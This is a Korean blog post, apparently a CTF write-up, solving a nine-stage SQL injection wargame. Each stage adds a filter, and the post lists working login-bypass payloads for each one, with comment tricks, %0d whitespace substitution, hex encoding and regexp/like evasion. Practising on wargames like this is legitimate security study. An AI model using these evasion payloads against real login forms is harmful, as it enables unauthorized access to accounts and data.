본문 바로가기
Wargame(CTF)

itchy's Funny injection 풀이

by Hide­ 2014. 6. 18.
반응형

총 9단계로 이뤄진 간단한 SQL Injection 워게임 사이트이다. (http://itchy.dothome.co.kr)

단계별로 올라갈수록 필터링이 하나하나 추가되는 방식이며 아래의 페이로드 말고도

다른 방법들이 충분히 존재할 수 있으므로 시험끝나고 다시 한번 풀어봐야겠다.

 

Stage 1.

id=admin'%23&pw=a

 

Stage 2. id에 # 와 -- 에 대한 필터링 추가)

id=admin' or '=&pw=a

 

Stage 3. id와 pw 모두 and 와 or 에 대한 필터링 추가)

id=admin'||'=&pw=a

 

Stage 4. id와 pw 모두 admin , 공백에 대한 필터링 추가)

id=ad'%0d'min&pw='<>1=1%23

id='||id%0dlike%0d'adm%'/*&pw=*/%23

id='||id%0dregexp%0d'adm'/*&pw=*/%23

id='||id=0x61646d696e||&pw='||1%23

 

Stage 5. id와 pw 모두 = , like에 대한 필터링 추가)

id=adm'%0d'in&pw='<>1%0din(1)%23

id='||1<2%0dgroup%0dby%0d1/*&pw=*/%23

id='||%0dascii(substr(reverse('nimda'),1,1))>10%26%26id%0dregexp%0d'adm'/*&pw=*/%23

 

Stage6. id와 pw ||, && 에 대한 필터링 추가)

id=adm'%0d'in&pw='<>1%0din(1)%23

id=adm'%0d'in&pw='<2%23

 

Stage 7. pw에 md5 함수를 추가 

id=adm'%0d'in'%2F*&pw=*%2F%23

 

Stage 8. id와 pw 모두 / 와 * 에 필터링 추가

id=adm'%0d'in&pw=')<2%23

 

Stage 9. id와 pw모두 mysql_real_escape_string 함수와 md5 두번째 인자에 true 추가(md5(text,true))

http://hides.tistory.com/250 참고

'Wargame(CTF)' 카테고리의 다른 글

Challenge 59  (0) 2014.07.23
Challenge 50  (0) 2014.07.22
Challenge 13  (0) 2014.06.15
Challenge 57  (0) 2014.06.12
Challenge 45  (0) 2014.06.12